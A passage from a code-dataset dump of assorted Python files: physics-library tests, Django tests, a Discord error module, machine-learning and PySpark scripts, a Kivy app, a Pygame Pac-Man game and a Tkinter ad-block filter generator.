(\"\", ValueError),\n (\"non-existing\", ValueError),\n ],\n )\n def 
test_from_str(self, description: str, expected: InteractionType):\n if expected is ValueError:\n with pytest.raises(ValueError, match=r\"interaction type\"):\n assert InteractionType.from_str(description)\n else:\n assert InteractionType.from_str(description) == expected\n\n\ndef test_create_domains(particle_database: ParticleCollection):\n pdg = particle_database\n pions = pdg.filter(lambda p: p.name.startswith(\"pi\"))\n domains = _create_domains(pions)\n assert len(domains) == 15\n assert domains[EdgeQN.baryon_number] == [0]\n assert domains[EdgeQN.strangeness] == [0]\n assert domains[EdgeQN.charmness] == [0]\n assert domains[EdgeQN.bottomness] == [0]\n assert domains[EdgeQN.charge] == [-1, 0, +1]\n assert domains[EdgeQN.spin_magnitude] == [0, 0.5, 1, 1.5, 2]\n assert (\n domains[EdgeQN.spin_projection]\n == [-2, -1.5, -1, -0.5] + domains[EdgeQN.spin_magnitude]\n )\n assert domains[EdgeQN.isospin_magnitude] == [0, 0.5, 1]\n assert domains[EdgeQN.isospin_projection] == [-1, -0.5, 0, 0.5, 1]\n\n\n@pytest.mark.parametrize(\"interaction_type\", list(InteractionType))\n@pytest.mark.parametrize(\"nbody_topology\", [False, True])\n@pytest.mark.parametrize(\"formalism\", [\"canonical\", \"canonical-helicity\", \"helicity\"])\ndef test_create_interaction_settings(\n particle_database: ParticleCollection,\n interaction_type: InteractionType,\n nbody_topology: bool,\n formalism: str,\n):\n settings = create_interaction_settings(\n formalism,\n particle_db=particle_database,\n nbody_topology=nbody_topology,\n )\n assert set(settings) == set(InteractionType)\n\n edge_settings, node_settings = settings[interaction_type]\n edge_qn_domains_str = { # strings are easier to compare with pytest\n qn_type.__name__: domain for qn_type, domain in edge_settings.qn_domains.items()\n }\n assert edge_qn_domains_str == {\n \"baryon_number\": [-1, 0, +1],\n \"electron_lepton_number\": [-1, 0, +1],\n \"muon_lepton_number\": [-1, 0, +1],\n \"tau_lepton_number\": [-1, 0, +1],\n \"parity\": [-1, +1],\n \"c_parity\": [-1, +1, None],\n \"g_parity\": [-1, +1, None],\n \"spin_magnitude\": _halves_domain(0, 4),\n \"spin_projection\": _halves_domain(-4, +4),\n \"charge\": _int_domain(-2, 2),\n \"isospin_magnitude\": _halves_domain(0, 1.5),\n \"isospin_projection\": _halves_domain(-1.5, +1.5),\n \"strangeness\": _int_domain(-3, +3),\n \"charmness\": _int_domain(-1, 1),\n \"bottomness\": _int_domain(-1, 1),\n }\n\n expected = {\n \"l_magnitude\": _int_domain(0, 2),\n \"s_magnitude\": _halves_domain(0, 2),\n }\n if \"canonical\" in formalism:\n expected[\"l_projection\"] = [-2, -1, 0, 1, 2]\n expected[\"s_projection\"] = _halves_domain(-2, 2)\n if formalism == \"canonical-helicity\":\n expected[\"l_projection\"] = [0]\n if \"helicity\" in formalism and interaction_type != InteractionType.WEAK:\n expected[\"parity_prefactor\"] = [-1, 1]\n if nbody_topology:\n expected[\"l_magnitude\"] = [0]\n expected[\"s_magnitude\"] = [0]\n if nbody_topology and formalism != \"helicity\":\n expected[\"l_projection\"] = [0]\n expected[\"s_projection\"] = [0]\n\n node_qn_domains_str = { # strings are easier to compare with pytest\n qn_type.__name__: domain for qn_type, domain in node_settings.qn_domains.items()\n }\n assert node_qn_domains_str == expected\n\n\n@pytest.mark.parametrize(\n (\"start\", \"stop\", \"expected\"),\n [\n (-0.3, 0.5, None),\n (-2.0, 0.5, [-2, -1.5, -1, -0.5, 0, 0.5]),\n (-1, +1, [-1, -0.5, 0, 0.5, +1]),\n ],\n)\ndef test_halves_range(start: float, stop: float, expected: list):\n if expected is None:\n with 
pytest.raises(ValueError, match=r\"needs to be multiple of 0.5\"):\n _halves_domain(start, stop)\n else:\n assert _halves_domain(start, stop) == expected\n","repo_name":"ComPWA/qrules","sub_path":"tests/unit/test_settings.py","file_name":"test_settings.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"61"} +{"seq_id":"43208344480","text":"from django.contrib.auth import get_user_model\nfrom django.test import TestCase\n\nfrom ..models import Group, Post\n\nUser = get_user_model()\n\n\nclass PostModelTest(TestCase):\n @classmethod\n def setUpClass(cls):\n super().setUpClass()\n cls.user = User.objects.create_user(username='auth')\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='Тестовый слаг',\n description='Тестовое описание',\n )\n cls.post = Post.objects.create(\n author=cls.user,\n text='Это обычный тестовый пост созданый просто для тестирования.',\n )\n\n def test_model_group_have_correct_object_name(self):\n \"\"\"Проверяем, что у модели 'group' корректно работает __str__.\"\"\"\n self.assertEqual(\n str(self.group),\n self.group.title,\n 'Записи не совпадают'\n )\n\n def test_model_post_less_fifteen_sym(self):\n \"\"\"Проверяем, что у модели 'post' корректно работает __str__.\"\"\"\n self.assertEqual(\n str(self.post),\n # self.post.text[:15],\n self.post.text,\n 'Вывод не сходится с условием.'\n )\n","repo_name":"DanilovKZN/YaHelper","sub_path":"yatube/posts/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35782704331","text":"from subprocess import call\nfrom circuit_explorer.utils import load_config\n\nconfig_file = '../configs/alexnet_sparse_config.py'\n\nconfig = load_config(config_file)\nlayers = config.layers\nunits = config.units\nbatch_size = 1\n\n\nprint(batch_size)\nprint(layers)\nprint(units)\n\ndata_path = '../image_data/imagenet_2/'\ndevice = 'cuda:2'\n\nsparsities = [.9,.8,.7,.6,.5,.4,.3,.2,.1,.05,.01,.005,.001]\n#sparsities = [.2]\n##layers = [layers[0]]\n#units = [units[0]]\n\nout_root = './correlations/'\n\noriginal_act_file = './original_activations/%s/imagenet_2/original_activations.pt'%config.name\n\ndel config\n\nfor unit in units:\n print('PROCESSING UNIT: %s'%str(unit))\n for layer in layers:\n print('PROCESSING LAYER: %s'%layer)\n for sparsity in sparsities:\n call_str = 'python force_correlation.py --unit %s --layer %s --sparsity %s --config %s --data-path %s --device %s --out-root %s --batch-size %s --original_act_file %s'%(str(unit),layer,str(sparsity),config_file,data_path,device,out_root,str(batch_size),original_act_file)\n call(call_str,shell=True)\n","repo_name":"chrishamblin7/circuit_explorer","sub_path":"method_comparison/submit_force_correlations.py","file_name":"submit_force_correlations.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73894703235","text":"from typing import Any, Dict, List, Optional, Tuple, Union\n\nfrom aiohttp import ClientResponse\n\n__all__ = (\n \"DisCatPyException\",\n \"HTTPException\",\n)\n\n\nclass DisCatPyException(Exception):\n \"\"\"Basis for all exceptions in DisCatPy. 
If you wanted to catch any exception\n thrown by DisCatPy, you would catch this exception.\n \"\"\"\n\n pass\n\n\ndef _shorten_error_dict(d: Dict[str, Any], key: str = \"\") -> Dict[str, str]:\n ret_items: List[Tuple[str, str]] = []\n\n for k, val in d.items():\n new_k = key + \".\" + k if key else k\n\n if isinstance(val, dict):\n try:\n _errors: List[Dict[str, Any]] = val[\"_errors\"]\n except KeyError:\n # recursively go through the dict to find the _errors list\n ret_items.extend(_shorten_error_dict(val, new_k).items())\n else:\n ret_items.append((new_k, \" \".join(x.get(\"message\", \"\") for x in _errors)))\n else:\n ret_items.append((new_k, val))\n\n return dict(ret_items)\n\n\nclass HTTPException(DisCatPyException):\n \"\"\"Represents an error while attempting to connect to the Discord REST API.\n\n Attributes\n ----------\n response: :type:`aiohttp.ClientResponse`\n The response from the attempted REST API request.\n text: :type:`str`\n The error text. Might be empty.\n status: :type:`int`\n The status of the request.\n code: :type:`int`\n The Discord-specific error code of the request.\n \"\"\"\n\n def __init__(self, response: ClientResponse, data: Optional[Union[Dict[str, Any], str]]):\n self.response = response\n self.status = response.status\n self.code: int\n self.text: str\n\n if isinstance(data, dict):\n self.code = data.get(\"code\", 0)\n base = data.get(\"message\", \"\")\n errors = data.get(\"errors\")\n if errors:\n errors = _shorten_error_dict(errors)\n helpful_msg = \"\\n\".join(f\"In {k}: {v}\" for k, v in errors.items())\n self.text = f\"{base}\\n{helpful_msg}\"\n else:\n self.text = base\n else:\n self.text = data or \"\"\n self.code = 0\n\n format = \"{0} {1} (error code: {2}\"\n if self.text:\n format += \": {3}\"\n\n format += \")\"\n\n super().__init__(format.format(response.status, response.reason, self.code, self.text))\n","repo_name":"AstroicyOP/Somecord","sub_path":"somecord/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"8632421352","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n\nimport pandas as pd\nfrom collections import defaultdict\nimport numpy as np\nimport math\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import preprocessing\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import AdaBoostRegressor\nfrom sklearn.datasets import make_regression\nfrom sklearn.gaussian_process import GaussianProcessRegressor\nfrom sklearn.gaussian_process.kernels import DotProduct, WhiteKernel, RBF\nfrom sklearn import svm\n\n\n# In[2]:\n\n\nX_test = pd.read_csv('Xtest.txt', sep=' ')\nY_test = pd.read_csv('Ytest.txt', sep=',')\nY_train = pd.read_csv('Ytrain.txt', sep=' ')\nX_train = pd.read_csv('Xtrain.txt', sep=' ')\nX_test = X_test.fillna(0)\nX_train = X_train.fillna(0)\nY_train = Y_train.fillna(0)\nY_train=Y_train.replace('?', 0)\nX_train=X_train.replace('?', 0)\nX_test = X_test.replace('?', 0)\n\n\n# In[3]:\n\n\nY_train = Y_train.drop('Id', 1)\nX_train = X_train.drop('Id', 1)\nX_test = X_test.drop('Id', 1)\n\n\n# In[4]:\n\n\na = DotProduct() + WhiteKernel()\n\n\n# In[5]:\n\n\n\nd = {}\nY_train['Z01']\nfor i in range(1, 15, 1):\n\n d[\"m\" + str(i)] = RandomForestRegressor(n_estimators=100, min_samples_leaf=3, 
max_features='sqrt',\n n_jobs=-1)\n col = 'Z' + '0' + str(i) if i<10 else 'Z'+ str(i)\n print(col)\n d[\"m\"+str(i)].fit(X_train, Y_train[col])\n\n\n# In[ ]:\n\n\nfor i in range(1, 15, 1):\n col = 'Z' + '0' + str(i) if i<10 else 'Z'+ str(i)\n print(col)\n Y_test[col] = d[\"m\"+str(i)].predict(X_test)\n\n\n# In[ ]:\n\n\nY_test['index'] = Y_test['Id'].str.split(\":\", n = 1, expand = True)[1]\nindexArr = []\nfor index, row in Y_test.iterrows(): \n# print(row[row[\"index\"]])\n indexArr.append(row[row[\"index\"]])\ntmp =np.asarray(indexArr)\nY_test['Value'] = tmp\nY_test['Id'] = Y_test['Id'].str.split(\":\", n = 1, expand = True)[0]\n\n\n# In[ ]:\n\n\nY_test = Y_test[['Id','Value']]\nY_test.to_csv('result.csv',index=False)\n\n","repo_name":"jiaranyu/440-module-2","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19774742973","text":"import kivy\nfrom kivy.app import App\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.properties import StringProperty, NumericProperty\nfrom kivy.clock import Clock\nimport threading\nfrom Classes.MosaicCreator import MosaicCreator\n\n\nclass MainWindow(BoxLayout):\n displayed_image_path = StringProperty('')\n progress_bar_value = NumericProperty(0)\n def __init__(self, **kwargs):\n self.image_change_trigger = Clock.create_trigger(self.change_displayed_image_from_thread)\n self.progress_bar_value_trigger = Clock.create_trigger(self.change_progress_bar_value)\n\n super(MainWindow, self).__init__(**kwargs)\n self.mosaic_creator_thread = threading.Thread(target=MosaicCreator, args=(self, '',''), daemon=True)\n\n # Will start creating a mosaic. Collecting paths from the user before entering the thread is necessary.\n def start_mosaic_creator_thread(self):\n if not self.mosaic_creator_thread.is_alive():\n image_path = MosaicCreator.get_user_image_path()\n mosaic_path = MosaicCreator.get_user_mosaic_target_path()\n self.mosaic_creator_thread = threading.Thread(target=MosaicCreator, args=(self, image_path, mosaic_path), daemon=True)\n self.mosaic_creator_thread.start()\n\n # Changes displayed image from another thread.\n def change_displayed_image_from_thread(self, image_path):\n if threading.current_thread() is threading.main_thread():\n self.displayed_image_path = self.new_displayed_image_path\n else:\n self.new_displayed_image_path = image_path\n self.image_change_trigger()\n\n def change_progress_bar_value(self, value):\n if threading.current_thread() is threading.main_thread():\n self.progress_bar_value = self.new_progress_bar_value\n else:\n self.new_progress_bar_value = value\n self.progress_bar_value_trigger()\n\nclass PhotomosaicApp(App):\n def build(self):\n return MainWindow()\n\nif __name__ == \"__main__\":\n PhotomosaicApp().run()\n","repo_name":"Basileus1990/Photomosaic","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19169673274","text":"import sys\nimport os\nimport gzip\nfrom collections import Counter\n\nimport argparse\nimport pyspark\nimport string\nfrom nltk.tokenize import TreebankWordTokenizer\n\ntokenizer = TreebankWordTokenizer()\n\nletter_set = set(string.ascii_uppercase + string.ascii_lowercase)\npunc_set = {\"'\", '-'}\nvalid_set = letter_set | punc_set\n\n\ndef parse_column_file(file_name):\n \"\"\"parse the wet files\n Args:\n file_name 
(string): a list of file names\n Returns:\n list[list[string]]: a list of documents\n \"\"\"\n\n\ndef val_and_std(token):\n \"\"\"check the validity of a token; standard it if needed\n Args:\n token (string): a token\n Returns:\n string: an standardized token if the token is valid\n otherwise return None\n \"\"\"\n token = token.strip(\"\\\"\\'-\")\n tran_t = token.replace(\"-\", \"\").replace(\"'\", \"\")\n if tran_t.isascii() and tran_t.isalpha():\n return token.lower()\n return None\n\n\ndef count_and_serialize(doc, v2id_bct):\n \"\"\"format a doc\n Args:\n doc (dict[string, int]): a doc\n v2id_bct (dict(string, int)): vocab dictionary\n Returns:\n string: the serialized document\n \"\"\"\n v2id = v2id_bct.value\n return ' '.join([f'{v2id[k]}:{v}' for k, v in doc.items()])\n\n\ndef word_doc_freq_map(doc):\n \"\"\"emit words\n Args:\n doc (list[string]): one document\n Returns:\n zip(string, int): emitted words\n \"\"\"\n words = set(doc)\n return zip(words, [1] * len(words))\n\n\ndef read_and_clean_records(args):\n \"\"\"\n read and clean records from compressed dumps\n Returns:\n a persisted rdd with valid docs\n \"\"\"\n # read wet file names\n # set up for file I/O\n # read wet files\n\n sp_df = spark.read.load(args.input_file,\n format=\"csv\", sep=\"\\t\", inferSchema=\"true\",\n header=\"true\")\n \n docs_rdd_with_st = (sp_df.select(['Top_comment_id', 'Top_comment_text', 'Post_text'])\n .rdd\n .repartition(args.num_executors)\n .map(lambda pld: (pld[0], [val_and_std(t) for t in tokenizer.tokenize(pld[1])]))\n .map(lambda doc: (doc[0], [x for x in doc[1] if x]))\n .filter(lambda doc: len(doc[1]) > 10)\n .persist(pyspark.StorageLevel.DISK_ONLY))\n\n # collect words to keep by their document frequencies\n old_n_docs = docs_rdd_with_st.count()\n high_freq = old_n_docs * 0.9\n words_to_keep = set(docs_rdd_with_st\n .map(lambda x: x[1])\n .flatMap(lambda doc: word_doc_freq_map(doc))\n .reduceByKey(lambda x, y: x + y)\n .map(lambda x: (x[0], x[1]))\n .filter(lambda x:\n args.low_freq_threshold <= x[1] < high_freq)\n .map(lambda x: x[0]).collect())\n # remove stop words\n with open(args.stop_words_file, 'r') as istream:\n stop_words = set()\n for line in istream.readlines():\n stop_words.add(line.strip())\n words_to_keep_bct = sc.broadcast(words_to_keep - stop_words)\n doc_rdd = (docs_rdd_with_st.map(lambda doc: (doc[0],\n [t for t in doc[1]\n if t in words_to_keep_bct.value]))\n .filter(lambda doc: len(doc[1]) > 0)\n .map(lambda doc: (doc[0], ' '.join(doc[1])))\n .persist(pyspark.StorageLevel.DISK_ONLY))\n return doc_rdd\n\n\nif __name__ == \"__main__\":\n # get command line arguments\n parser = argparse.ArgumentParser(description='Arguments for process topic modeling data')\n # model parameters\n parser.add_argument('--input_file', type=str, required=True,\n help=('The path to the dataframe (tsv from data.py).'\n 'e.g. 
research-out/train/part-00000-c824c2b0-19d6-4eaf-a6f7-efd82e586274-c000.csv'))\n parser.add_argument('--output_file', type=str, required=True,\n help='The path to the output file.')\n parser.add_argument('--low_freq_threshold', type=int, required=False,\n default=10,\n help='the words need to appear in at least such number of docs')\n parser.add_argument('--num_executors', type=int, default=64,\n help='The number of executors')\n parser.add_argument('--stop_words_file', type=str, required=True,\n default='models/english', help=\"path to stopword file\")\n args = parser.parse_args()\n\n # setup SparkContext\n conf = pyspark.SparkConf().setAppName(\"TopicModelingProcessor\")\n sc = pyspark.SparkContext(conf=conf)\n spark = pyspark.sql.SparkSession(sc)\n\n doc_rdd = read_and_clean_records(args)\n (doc_rdd.toDF(['Top_comment_id', 'text_for_topic_modeling'])\n .repartition(1)\n .write.csv(args.output_file, header=True, sep='\\t'))\n # close SparkContext\n sc.stop()\n","repo_name":"davidjurgens/prosocial-conversation-forecasting","sub_path":"src/features/tpcdata.py","file_name":"tpcdata.py","file_ext":"py","file_size_in_byte":5059,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"5070514342","text":"import pygame.sprite\n\nfrom src.settings import *\nfrom src.classes.background import Background\nfrom src.classes.sound import Sound\nfrom src.classes.table import Table\nfrom src.classes.grid import Grid\nfrom src.classes.field import Field\nfrom src.classes.pacman import Pacman\nfrom src.classes.enemy import Enemy\nfrom src.classes.dot import Dot\nfrom src.classes.dot_flashing import DotFlashing\nfrom src.classes.bonus import Bonus\n\n\n# ======================================================================== create Sprite groups\n\npacman_group = pygame.sprite.GroupSingle()\nenemy_group = pygame.sprite.Group()\nfield_group = pygame.sprite.GroupSingle()\ndot_group = pygame.sprite.Group()\ndot_flashing_group = pygame.sprite.Group()\nbonus_group = pygame.sprite.GroupSingle()\n\n# # add to all_sprite_groups\nall_spite_groups_dict = {'pacman' : pacman_group, 'enemy': enemy_group, 'field' : field_group , 'dot': dot_group,\n 'dot_flashing' : dot_flashing_group, 'bonus': bonus_group,\n }\n\n# # ======================================================================= initialize Classes\n#\npacman = Pacman(all_spite_groups_dict)\n\n# # add to group\n\npacman_group.add(pacman)\n\n\n# create new enemies\ndef enemy_creator():\n picture_enemy_color_type = f'src/assets/images/enemies/{randint(1, 7)}.png'\n enemy = Enemy(all_spite_groups_dict, pacman, picture_enemy_color_type)\n enemy_group.add(enemy)\n\n# create dots and flashing dots and add to groups\ndef food_creator():\n for rows, cols in Dot.food_cells.items():\n for col_index in range(len(cols)):\n if cols[col_index] == '0' or cols[col_index] == '2':\n row = (col_index + 1) * BLOCK_SIZE - 15\n col = rows * BLOCK_SIZE - 15\n if cols[col_index] == '2': # add flashing Dot\n dot_flash = DotFlashing(row, col)\n dot_flashing_group.add(dot_flash)\n else:\n dot = Dot(row, col)\n dot_group.add(dot)\n\n# ==================================================================\ntable = Table(all_spite_groups_dict, pacman)\n\n# Game State\nclass GameState(Sound):\n COOLDOWN = 1000 # milliseconds\n start_timer = pygame.time.get_ticks()\n\n def __init__(self,):\n self.state = 'intro'\n self.background_picture = None\n self.start_game_counter = 3\n self.is_music_play = False\n self.is_start_game = False\n 
self.is_created_enemy = False\n self.is_created_bonus = False\n self.is_game_over = False\n self.reset_current_game_data = False\n self.reset_all_data_for_new_game = False\n\n def game(self):\n\n # ----------------------------- NEW GAME reset all data\n if self.reset_all_data_for_new_game:\n self.background_picture = None\n self.is_music_play = False\n self.start_game_counter = 3\n self.is_start_game = False\n self.is_created_enemy = False\n self.is_created_bonus = False\n self.is_game_over = False\n self.reset_current_game_data = False\n [all_spite_groups_dict[group].empty() for group in all_spite_groups_dict]\n pacman_group.add(pacman)\n pacman.reset_all_data()\n self.reset_all_data_for_new_game = False\n\n\n # ---------------------------- if level complete\n if pacman.is_level_complete:\n pygame.time.delay(3000)\n self.reset_current_game_data = True\n self.state = 'get_ready'\n\n # ---------------------------- pacman death replay level\n if pacman.is_level_restart:\n self.reset_current_game_data = True\n self.state = 'get_ready'\n\n # ----------------------------- Reset current data\n if self.reset_current_game_data:\n self.background_picture = None\n self.is_music_play = False\n self.start_game_counter = 3\n self.is_start_game = False\n self.is_game_over = False\n self.is_created_bonus = False\n enemy_group.empty()\n pacman_group.empty()\n pacman_group.add(pacman)\n pacman.reset_current_data()\n bonus_group.empty()\n\n # ----------------------------- start game\n if not self.is_start_game:\n Sound.stop_all_sounds()\n Sound.pacman_start(self)\n Sound.game_music(self)\n self.reset_current_game_data = False\n self.is_start_game = True\n\n # ------- add field\n if pacman.level < 9:\n level = pacman.level\n else:\n level = 9\n field = Field(f'./src/assets/images/game_fields/{level}.png')\n field_group.add(field)\n\n # ------ add dots\n if not len(dot_group):\n food_creator() # --- add dots\n\n # ------------- generate enemies\n if not self.is_created_enemy: # not\n time_now = pygame.time.get_ticks()\n if time_now - self.start_timer > self.COOLDOWN + 1000:\n self.start_timer = time_now\n if len(enemy_group) < 14 + pacman.level:\n enemy_creator()\n\n # ------------- generate bonus fruit\n if not self.is_created_bonus:\n if len(dot_group) == 100:\n fruit_num = pacman.level - 1\n if fruit_num > 9:\n fruit_num = randint(0, 9)\n bonus_group.add(Bonus(fruit_num))\n Sound.add_bonus_fruit(self)\n self.is_created_bonus = True\n\n if pacman.is_pause:\n pacman.is_pause = False\n self.state = 'pause'\n\n if pacman.is_game_over:\n Sound.stop_all_sounds()\n Sound.game_over_music(self)\n self.state = 'game_over'\n # # =================================================== UPDATE\n # Grid.draw_grid(self)\n table.update()\n\n # # --------------------------- draw sprite group\n field_group.draw(SCREEN)\n dot_group.draw(SCREEN)\n dot_flashing_group.draw(SCREEN)\n pacman_group.draw(SCREEN)\n enemy_group.draw(SCREEN)\n bonus_group.draw(SCREEN)\n\n # # --------------------------- update sprite group\n pacman_group.update()\n enemy_group.update()\n # dot_group.update()\n dot_flashing_group.update()\n\n def intro(self):\n if not self.is_music_play:\n Sound.intro_music(self)\n self.is_music_play = True\n font = './src/fonts/aAblasco.ttf'\n background_image('./src/assets/images/backgrounds/bg_intro.png')\n text_creator('Crazy PacMan', 'gold2', 60, 100, 70, None, './src/fonts/cute.ttf')\n text_creator('Menu - M', 'red', S_W - 230, S_H - 160, 30, None, font)\n text_creator('Credits - C', 'fuchsia', S_W - 230, S_H - 110, 
30, None, font)\n text_creator('Start game - SPACE', 'deepskyblue', S_W // 3 - 6, S_H - 24, 32, None, font)\n text_creator('By Abaddon', 'orange', 10, S_H - 10, 15, None, font)\n text_creator('Copyright 2023', 'white', S_W - 125, S_H - 10, 15, None, font)\n\n if check_key_pressed(pygame.K_SPACE):\n Sound.btn_click(self)\n self.start_game_counter = 3\n Sound.stop_all_sounds()\n self.state = 'get_ready'\n if check_key_pressed(pygame.K_c):\n Sound.btn_click(self)\n self.state = 'credits'\n if check_key_pressed(pygame.K_m):\n Sound.btn_click(self)\n self.state = 'menu'\n exit_game()\n\n def menu(self):\n background_image('./src/assets/images/backgrounds/bg_menu.png')\n text_creator('Press RETURN to back...', 'bisque', S_W - 230, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n if check_key_pressed(pygame.K_RETURN):\n self.state = 'intro'\n exit_game()\n\n def credits(self):\n font = None\n size = 16\n # background_image('./src/assets/images/backgrounds/bg_EMPTY.png')\n text_creator('CREDITS', 'slateblue3', S_W // 2 - 100, 40, 50, None, './src/fonts/aAblasco.ttf', True)\n text_creator('version: 1.0.0-beta', 'cornsilk', S_W - 160, 20, 16, None, './src/fonts/aAblasco.ttf')\n\n text_creator('Free images:', 'brown', 110, 100, 35, None, font)\n text_creator('https://www.pngwing.com', 'cadetblue4', 130, 125, 30, None, font)\n\n text_creator('Free sounds:', 'brown', 110, 200, 35, None, font)\n text_creator('https://freesound.org/', 'cadetblue4', 130, 225, 30, None, font)\n\n text_creator('Platform 2D game:', 'brown', 110, S_H // 2, 34, None, font)\n text_creator('https://www.pygame.org', 'cadetblue4', 130, S_H // 2 + 24, 30, None, font)\n\n SCREEN.blit(pygame.image.load('./src/assets/images/title/pygame_logo.png'), (S_W // 4 - 50, S_H - 266))\n\n text_creator('Developer:', 'brown', 30, S_H - 60, 30, None, font)\n text_creator('by Abaddon', 'cadetblue4', 50, S_H - 40, 30, None, font)\n\n text_creator('Bug rapports:', 'brown', S_W // 2 - 90, S_H - 60, 30, None, font)\n text_creator('subtotal@abv.bg', 'cadetblue4', S_W // 2 - 70, S_H - 40, 30, None, font)\n\n text_creator('Copyright:', 'brown', S_W - 140, S_H - 60, 30, None, font)\n text_creator('© 2023', 'cadetblue4', S_W - 120, S_H - 40, 30, None, font)\n\n text_creator('Press RETURN to back...', 'bisque', S_W - 230, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n\n if check_key_pressed(pygame.K_RETURN):\n Sound.btn_click(self)\n self.state = 'intro'\n exit_game()\n\n def get_ready(self):\n Sound.stop_all_sounds()\n time_now = pygame.time.get_ticks()\n if time_now - self.start_timer > self.COOLDOWN:\n self.start_game_counter -= 1\n self.start_timer = time_now\n font = './src/fonts/aAblasco.ttf'\n background_image('./src/assets/images/backgrounds/bg_poster.png')\n text_creator('By Abaddon', 'orange', 10, S_H - 10, 15, None, font)\n text_creator('Copyright 2023', 'white', S_W - 125, S_H - 10, 15, None, font)\n text_creator(f'START AFTER: {self.start_game_counter}', 'purple', 215, S_H - 40, 40, None, './src/fonts/cute.ttf')\n\n if self.start_game_counter == 0:\n Sound.pacman_start(self)\n Sound.game_music(self)\n self.state = 'game'\n\n def start_pause(self):\n background_image('./src/assets/images/backgrounds/bg_pause.png')\n text_creator('PAUSE', 'red3', S_W // 2 + 60, S_H // 2 - 30, 80, None, './src/fonts/cute.ttf')\n text_creator('Press RETURN to continue...', 'bisque', S_W - 255, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n\n if key_pressed(pygame.K_RETURN):\n self.state = 'game'\n\n def game_over(self):\n 
background_image('./src/assets/images/backgrounds/bg_game_over2.png', 4)\n text_creator('GAME OVER', 'red', S_W // 2 - 25, S_H // 2 - 150, 54, None, './src/fonts/cute.ttf')\n text_creator('Press RETURN to back...', 'bisque', S_W - 240, S_H - 12, 20, None,'./src/fonts/aAblasco.ttf')\n\n if key_pressed(pygame.K_RETURN):\n Sound.stop_all_sounds()\n Sound.intro_music(self)\n self.reset_all_data_for_new_game = True\n self.state = 'intro'\n exit_game()\n\n # ========================================= state manager ...\n def state_manager(self):\n # print(self.state)\n if self.state == 'intro':\n self.intro()\n if self.state == 'game':\n self.game()\n if self.state == 'get_ready':\n self.get_ready()\n if self.state == 'menu':\n self.menu()\n if self.state == 'credits':\n self.credits()\n if self.state == 'pause':\n self.start_pause()\n if self.state == 'game_over':\n self.game_over()\n\n\n\n# ================================ create new GameState\ngame_state = GameState()\n\n\n# ============= Starting Game loop\nwhile True:\n SCREEN.fill(pygame.Color('black'))\n game_state.state_manager()\n pygame.display.update()\n CLOCK.tick(FPS)\n exit_game()\n","repo_name":"byAbaddon/PyGame-Crazy_Pacman","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12231,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8821181463","text":"import sys\r\nfrom tkinter import *\r\nfrom tkinter import ttk, messagebox\r\nimport os.path\r\n\r\n# Main Window\r\nmywin = Tk()\r\nmywin.title(\"AdBlock Generator v0.1\")\r\nmywin.geometry(\"339x160\")\r\nmywin.eval('tk::PlaceWindow . center')\r\nmywin.resizable(False, False)\r\nmywin.attributes(\"-alpha\", 0.91)\r\nicon = os.path.join(sys.path[0], \"pyicon.ico\")\r\nmywin.iconbitmap(icon)\r\n\r\n\r\ndef about():\r\n messagebox.showinfo(\"About\", \"Created by 6l4br10n!\")\r\n\r\n\r\ndef info():\r\n messagebox.showinfo(\"Information\", \"Success!\")\r\n\r\n\r\ndef generate():\r\n the_first_part = \"@@||\"\r\n the_second_part = \"^$generichide\"\r\n the_tird_part = \"##script:inject(bab-defuser.js)\"\r\n\r\n theSite = siteEingabe.get()\r\n generated_code.insert(INSERT, the_first_part + theSite + the_second_part + '\\n')\r\n generated_code.insert(INSERT, theSite + the_tird_part)\r\n button1['state'] = 'disabled'\r\n\r\n\r\ndef copy_code():\r\n generated_code1 = generated_code.get(\"1.0\", 'end-1c')\r\n mywin.clipboard_clear()\r\n mywin.clipboard_append(generated_code1)\r\n button2['state'] = 'disabled'\r\n\r\n\r\n# Menu\r\nmenubar = Menu(mywin)\r\nmywin.config(menu=menubar)\r\n# Undermenu\r\nfile_menu = Menu(menubar, tearoff=0)\r\nfile_menu.add_command(label=\"Exit\", command=mywin.destroy)\r\n\r\nhelp_menu = Menu(menubar, tearoff=0)\r\nhelp_menu.add_command(label=\"About\", command=about)\r\n# Hauptmenu\r\nmenubar.add_cascade(label=\"File\", menu=file_menu)\r\nmenubar.add_cascade(label=\"Help\", menu=help_menu)\r\n\r\n# Labels \r\ninputLabel = ttk.Label(mywin, text=\"Website:\", anchor=\"w\")\r\ninputLabel.place(x=10, y=11, width=200)\r\n\r\n# TextBoxes\r\nsiteEingabe = ttk.Entry(mywin)\r\nsiteEingabe.place(x=70, y=12, width=125)\r\n\r\ngenerated_code = Text(mywin)\r\ngenerated_code.place(x=10, y=45, height=80, width=320)\r\n\r\n# Buttons\r\nbutton1 = ttk.Button(mywin, text=\"Generate\", command=generate)\r\nbutton1.place(x=200, y=10, 